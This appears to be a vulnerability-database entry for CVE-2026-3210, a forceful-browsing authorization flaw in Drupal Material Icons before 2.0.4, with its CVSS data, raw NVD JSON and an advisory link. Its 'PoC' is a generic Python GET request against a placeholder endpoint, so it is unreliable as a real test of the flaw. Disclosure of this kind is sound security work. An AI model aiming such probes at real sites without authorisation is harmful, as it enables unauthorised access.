Security Vulnerability Report
中文
CVE-2026-3210 CVSS 5.3 MEDIUM

CVE-2026-3210

Published: 2026-03-25 16:16:22
Last Modified: 2026-03-31 19:22:13

Description

Incorrect Authorization vulnerability in Drupal Material Icons allows Forceful Browsing.This issue affects Material Icons: from 0.0.0 before 2.0.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:imagexmedia:material_icons:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Material Icons < 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://example.com/material-icons/hidden-endpoint" # Send a GET request to test for forceful browsing response = requests.get(target_url) # Check if access was granted (HTTP 200 OK) if response.status_code == 200: print("[+] Vulnerability confirmed! Access granted to restricted resource.") print(f"[+] Response content: {response.text[:100]}") else: print("[-] Access denied or resource not found.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3210", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:21.940", "lastModified": "2026-03-31T19:22:12.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Authorization vulnerability in Drupal Material Icons allows Forceful Browsing.This issue affects Material Icons: from 0.0.0 before 2.0.4."}, {"lang": "es", "value": "Vulnerabilidad de autorización incorrecta en Drupal Material Icons permite la navegación forzada. Este problema afecta a Material Icons: desde 0.0.0 hasta antes de 2.0.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagexmedia:material_icons:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "2.0.4", "matchCriteriaId": "F1D849DD-94CE-441A-B0A0-7D338F5078C5"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-011", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}